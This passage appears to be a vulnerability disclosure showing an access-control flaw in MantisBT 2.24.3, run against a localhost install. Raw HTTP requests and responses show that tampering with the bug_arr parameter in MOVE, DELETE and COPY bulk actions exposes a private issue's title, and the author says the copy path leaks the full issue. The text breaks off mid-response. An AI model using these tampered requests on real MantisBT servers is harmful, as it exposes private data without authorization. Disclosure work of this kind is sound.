User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_page_token=20200927VytbpqZq-H6AOMpwgFL3-510O_GESAhb&bug_arr%5B%5D=8&action=MOVE
```

- Just edit the ``bug_arr%5B%5D=`` to ``7`` <- private issue, and it will render the summary/title of the issue
- ``Delete`` functionality is almost the same

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_page_token=202009278EV6inaVGOOm_NWIFfBv911-mp-b93-g&bug_arr%5B%5D=8&action=DELETE
```

- Take note you can't move/delete these issues; it returns ``You did not have appropriate permissions to perform that action.`` However, it's too late, the summary/title has already leaked.

### Copying issues : For fun fun fun!

- In this part the attacker manages to **fully leak** the issues
- As a malicious actor, go to [http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184](http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184)
- You can see the ``Viewing issues`` part, the ``select all`` checkbox and a dropdown.
- The problem on this dropdown is the ``Copy`` functionality

> Note: I noticed that ``Assigned to Me (Unresolved)`` has a different number of parameters; the ``bug_arr_all=all`` is required. Go select ``Assigned to Me (Unresolved)`` and compare to ``unassigned``, which doesn't have ``bug_arr_all=all``.

**Normal request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=8&bug_arr_all=all&action=COPY
```

**Normal response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:50:18 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:50:18 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:50:18 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11551
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html> <html> <head> <meta http-equiv="Content-type"
content="text/html; charset=utf-8" /> <title>MantisBT</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script> <script 
type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> first project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div 
class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=1"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> 
</li> <li> <a href="/mantisbt/mantisbt-2.24.3/changelog_page.php"> <i class="menu-icon fa fa-retweet"></i> <span class="menu-text"> Change Log </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/roadmap_page.php"> <i class="menu-icon fa fa-road"></i> <span class="menu-text"> Roadmap </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/summary_page.php"> <i class="menu-icon fa fa-bar-chart-o"></i> <span class="menu-text"> Summary </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a> <span class="label hidden-xs label-default arrowed">manager</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=10" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000010</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span 
class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="col-md-12 col-xs-12"> <div id="action-group-div" class="form-container"> <form method="post" action="bug_actiongroup.php"> <input type="hidden" name="bug_actiongroup_COPY_token" value="20200927tSfUmsUZ6RBtNUVr78zlF6QZ6wmCIpSR"/> <input type="hidden" name="action" value="COPY" /> <input type="hidden" name="bug_arr[]" value="8" /> <div class="widget-box widget-color-blue2"> <div class="widget-header widget-header-small"> <h4 class="widget-title lighter"> Copy issues to </h4> </div> <div class="widget-body"> <div class="widget-main no-padding"> <div class="table-responsive"> <table class="table table-bordered table-condensed table-striped"> <tbody> <tr> <th class="category"> Copy issues to </th> <td> <select name="project_id" class="input-sm" required><option value="1">first project</option> </select> </td> </tr> <tr class="spacer"></tr> <tr><th class="category" colspan="2">Selected Issues</th></tr><tr> <td><i class="fa fa-square fa-status-box status-50-fg"></i> <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a></td> <td>Hello I am the attacker</td> </tr> <tr class="spacer"></tr> </tbody> </table> </div> </div> <div class="widget-toolbox padding-8 clearfix"> <input type="submit" class="btn btn-primary btn-white btn-round" value="Copy Issues" /> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT 
Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." /></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html>
```

- Change the value of ``bug_arr%5B%5D=`` to ``7``

**Exploit request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1

bug_arr%5B%5D=7&bug_arr_all=all&action=COPY
```

**Exploit response**

```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:51:40 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:51:40 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:51:40 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11070
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html> <html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>MantisBT</title> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/default.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/status_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/dropzone-5.5.0.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-3.4.1.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/font-awesome-4.6.3.min.css" /> <link rel="stylesheet" type="text/css"
href="http://localhost/mantisbt/mantisbt-2.24.3/css/fonts.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/bootstrap-datetimepicker-4.17.47.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace.min.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-mantis.css" /> <link rel="stylesheet" type="text/css" href="http://localhost/mantisbt/mantisbt-2.24.3/css/ace-skins.min.css" /> <link rel="shortcut icon" href="/mantisbt/mantisbt-2.24.3/images/favicon.ico" type="image/x-icon" /> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: full-text search" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=text"/> <link rel="search" type="application/opensearchdescription+xml" title="MantisBT: search by Issue Id" href="http://localhost/mantisbt/mantisbt-2.24.3/browser_search_plugin.php?type=id"/> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_config.php?cache_key=e588734b679b1257c1e1720ce2aca5d6"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/javascript_translations.php?cache_key=38fd4ec05f3127949acd785e9a18aaab"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/jquery-2.2.4.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/dropzone-5.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/common.js"></script> </head> <body class="skin-3"> <style> * { font-family: "Open Sans"; } h1, h2, h3, h4, h5 { font-family: "Open Sans"; } </style> <div id="navbar" class="navbar navbar-default navbar-collapse navbar-fixed-top noprint"><div id="navbar-container" class="navbar-container"><button id="menu-toggler" type="button" class="navbar-toggle menu-toggler pull-left hidden-lg hidden-md" data-target="#sidebar"><span class="sr-only">Toggle 
sidebar</span><span class="icon-bar"></span><span class="icon-bar"></span><span class="icon-bar"></span></button><div class="navbar-header"><a href="/mantisbt/mantisbt-2.24.3/my_view_page.php" class="navbar-brand"><span class="smaller-75"> MantisBT </span></a><button type="button" class="navbar-toggle navbar-toggle collapsed pull-right hidden-sm hidden-md hidden-lg" data-toggle="collapse" data-target=".navbar-buttons,.navbar-menu"><span class="sr-only">Toggle user menu</span><i class="ace-icon fa fa-user fa-2x white"></i> </button></div><div class="navbar-buttons navbar-header navbar-collapse collapse"><ul class="nav ace-nav"><li class="hidden-sm hidden-xs"><div class="btn-group btn-corner padding-right-8 padding-left-8"><a class="btn btn-primary btn-sm" href="bug_report_page.php"><i class="fa fa-edit"></i> Report Issue</a></div></li><li class="grey" id="dropdown_projects_menu"> <a data-toggle="dropdown" href="#" class="dropdown-toggle"> second project <i class="ace-icon fa fa-angle-down bigger-110"></i> </a> <ul id="projects-list" class=" dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"> <li><div class="projects-searchbox"><input class="search form-control input-md" placeholder="Search" /></div></li><li class="divider"></li> <li><div class="scrollable-menu"><ul class="list dropdown-yellow no-margin"><li><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=0">All Projects </a></li> <li class="divider"></li> <li class="active"><a href="/mantisbt/mantisbt-2.24.3/set_project.php?project_id=1" class="project-link"> first project </a></li> </ul></div></li></ul> </li> <li class="grey"><a data-toggle="dropdown" href="#" class="dropdown-toggle"><i class="ace-icon fa fa-user fa-2x white"></i> <span class="user-info">manager</span><i class="ace-icon fa fa-angle-down"></i></a><ul class="user-menu dropdown-menu dropdown-menu-right dropdown-yellow dropdown-caret dropdown-close"><li><a href="/mantisbt/mantisbt-2.24.3/account_page.php"><i 
class="ace-icon fa fa-user"> </i> My Account</a></li><li><a href="http://localhost/mantisbt/mantisbt-2.24.3/issues_rss.php?username=manager&key=iLKFE3m8D11EdAtHoGxboYzcPjG11f41lnnKeXpgsf4e6v2261dcSSKrWrKg6fIjSj-E-Upq9mkaxxA22-QW&project_id=2"><i class="ace-icon fa fa-rss-square orange"> </i> RSS</a></li><li class="divider"></li><li><a href="/mantisbt/mantisbt-2.24.3/logout_page.php"><i class="ace-icon fa fa-sign-out"> </i> Logout</a></li></ul></li></ul></div></div></div><div class="main-container" id="main-container"> <div id="sidebar" class="sidebar sidebar-fixed responsive compact "><ul class="nav nav-list"><li> <a href="/mantisbt/mantisbt-2.24.3/my_view_page.php"> <i class="menu-icon fa fa-dashboard"></i> <span class="menu-text"> My View </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/view_all_bug_page.php"> <i class="menu-icon fa fa-list-alt"></i> <span class="menu-text"> View Issues </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/bug_report_page.php"> <i class="menu-icon fa fa-edit"></i> <span class="menu-text"> Report Issue </span> </a> <b class="arrow"></b> </li> <li> <a href="/mantisbt/mantisbt-2.24.3/manage_overview_page.php"> <i class="menu-icon fa fa-gears"></i> <span class="menu-text"> Manage </span> </a> <b class="arrow"></b> </li> </ul><div id="sidebar-btn" class="sidebar-toggle sidebar-collapse"><i data-icon2="ace-icon fa fa-angle-double-right" data-icon1="ace-icon fa fa-angle-double-left" class="ace-icon fa fa-angle-double-left"></i></div></div><div class="main-content"> <div id="breadcrumbs" class="breadcrumbs noprint"> <ul class="breadcrumb"> <li><i class="fa fa-user home-icon active"></i> <a href="/mantisbt/mantisbt-2.24.3/account_page.php">manager ( manager ) </a> <span class="label hidden-xs label-default arrowed">manager</span></li> </ul> <div class="nav-recent hidden-xs">Recently Visited: <a href="/mantisbt/mantisbt-2.24.3/view.php?id=10" title="[new] THIS IS MY FIRST REPORT ON 
FIRST PROJECT">0000010</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=8" title="[assigned] Hello I am the attacker">0000008</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=2" title="[new] THIS IS MY FIRST REPORT ON FIRST PROJECT">0000002</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=5" title="[new] this is my private project">0000005</a>, <a href="/mantisbt/mantisbt-2.24.3/view.php?id=3" title="[new] THIS IS MY second REPORT ON FIRST PROJECT">0000003</a></div><div id="nav-search" class="nav-search"><form class="form-search" method="post" action="/mantisbt/mantisbt-2.24.3/jump_to_bug.php"><span class="input-icon"><input type="text" name="bug_id" autocomplete="off" class="nav-search-input" placeholder="Issue #"><i class="ace-icon fa fa-search nav-search-icon"></i></span></form></div> </div> <div class="page-content"> <div class="row"> <div class="col-md-12 col-xs-12"> <div id="action-group-div" class="form-container"> <form method="post" action="bug_actiongroup.php"> <input type="hidden" name="bug_actiongroup_COPY_token" value="20200927YQX5myIJlc0m_RVH6oqWVPd02Z4ncKwU"/> <input type="hidden" name="action" value="COPY" /> <input type="hidden" name="bug_arr[]" value="7" /> <div class="widget-box widget-color-blue2"> <div class="widget-header widget-header-small"> <h4 class="widget-title lighter"> Copy issues to </h4> </div> <div class="widget-body"> <div class="widget-main no-padding"> <div class="table-responsive"> <table class="table table-bordered table-condensed table-striped"> <tbody> <tr> <th class="category"> Copy issues to </th> <td> <select name="project_id" class="input-sm" required><option value="1">first project</option> </select> </td> </tr> <tr class="spacer"></tr> <tr><th class="category" colspan="2">Selected Issues</th></tr><tr> <td><i class="fa fa-square fa-status-box status-50-fg"></i> <a href="/mantisbt/mantisbt-2.24.3/view.php?id=7" title="[assigned] This is my private issue please dont access me">0000007</a></td> <td>This is my 
private issue please dont access me</td> </tr> <tr class="spacer"></tr> </tbody> </table> </div> </div> <div class="widget-toolbox padding-8 clearfix"> <input type="submit" class="btn btn-primary btn-white btn-round" value="Copy Issues" /> </div> </div> </div> </form> </div> </div> </div> </div> </div> <div class="clearfix"></div> <div class="space-20"></div> <div class="footer noprint"> <div class="footer-inner"> <div class="footer-content"> <div class="col-md-6 col-xs-12 no-padding"> <address> <strong>Powered by <a href="https://www.mantisbt.org" title="bug tracking software">MantisBT </a></strong> <br> <small>Copyright © 2000 - 2020 MantisBT Team</small><br><small>Contact <a href="mailto:webmaster@example.com" title="Contact the webmaster via e-mail.">administrator</a> for assistance</small><br> </address> </div> <div class="col-md-6 col-xs-12"> <div class="pull-right" id="powered-by-mantisbt-logo"> <a href="https://www.mantisbt.org" title="Mantis Bug Tracker: a free and open source web based bug tracking system."><img src="/mantisbt/mantisbt-2.24.3/images/mantis_logo.png" width="102" height="35" alt="Powered by Mantis Bug Tracker: a free and open source web based bug tracking system." 
/></a> </div> </div> </div> </div> </div> <a class="btn-scroll-up btn btn-sm btn-inverse display" id="btn-scroll-up" href="#"> <i class="ace-icon fa fa-angle-double-up icon-only bigger-110"></i> </a> </div> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-3.4.1.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/moment-with-locales-2.24.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/bootstrap-datetimepicker-4.17.47.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/typeahead.jquery-1.3.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/list-1.5.0.min.js"></script> <script type="text/javascript" src="/mantisbt/mantisbt-2.24.3/js/ace.min.js"></script> </body> </html>
```

- It will redirect to ``bug_actiongroup_page.php``
- Click ``Copy issues``

**Request**

```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=10%2C6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_actiongroup_COPY_token=202009271-2rIHMkDM1rpzJGjW1dFUysY9Sqp-5m&action=COPY&bug_arr%5B%5D=7&project_id=1
```

**Response**

```
HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 23:56:39 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:56:39 GMT
